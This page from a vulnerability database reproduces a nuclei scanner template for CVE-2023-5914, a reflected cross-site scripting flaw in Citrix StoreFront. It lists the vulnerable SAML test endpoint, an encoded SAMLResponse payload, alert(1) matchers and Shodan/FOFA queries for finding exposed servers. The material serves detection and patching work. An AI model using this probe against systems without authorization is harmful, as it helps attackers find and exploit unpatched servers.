Lucene search
K

Citrix StoreFront - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 93 Views

Citrix StoreFront - Reflected Cross-Site Scripting vulnerability without authentication. Exploitable through coercing an error message during XML parsing in the SSO flow

Related
Refs
Code
id: CVE-2023-5914

info:
  name: Citrix StoreFront - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript via reflected XSS during XML parsing in the SSO flow, potentially stealing user credentials or session tokens.
  remediation: |
    Apply Citrix security updates immediately. Update to StoreFront versions 2402, 2203 CU1, 2203 LTSR CU5, 1912 LTSR CU8, or later.
  reference:
    - https://www.assetnote.io/resources/research/continuing-the-citrix-saga-cve-2023-5914-cve-2023-6184
    - https://support.citrix.com/article/CTX583759/citrix-storefront-security-bulletin-for-cve20235914
    - https://www.youtube.com/watch?v=t8MeUQrPqec
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5914
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5914
    cwe-id: CWE-79
    epss-score: 0.73142
    epss-percentile: 0.99387
    cpe: cpe:2.3:a:cloud:citrix_storefront:*:*:*:*:ltsr:*:*:*
  metadata:
    max-request: 1
    vendor: cloud
    product: citrix_storefront
    shodan-query:
      - html:"/Citrix/StoreWeb"
      - http.html:"/citrix/storeweb"
    fofa-query: body="/citrix/storeweb"
  tags: cve,xss,citrix,storefront,cve2023,cloud,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/Citrix/teststoreAuth/SamlTest"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(1)</script>", "XmlException")'
        condition: and
# digest: 4b0a00483046022100fe02365c1f6d60ed7879b016b55b1ca63e1ef51821d430200cb14abd5b1782c5022100c9af1d17453686abd61dd3c5220a0b3e840333b827b96748b32c5f393a81b2b6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.15.4 - 7.2
EPSS0.73142
SSVC
93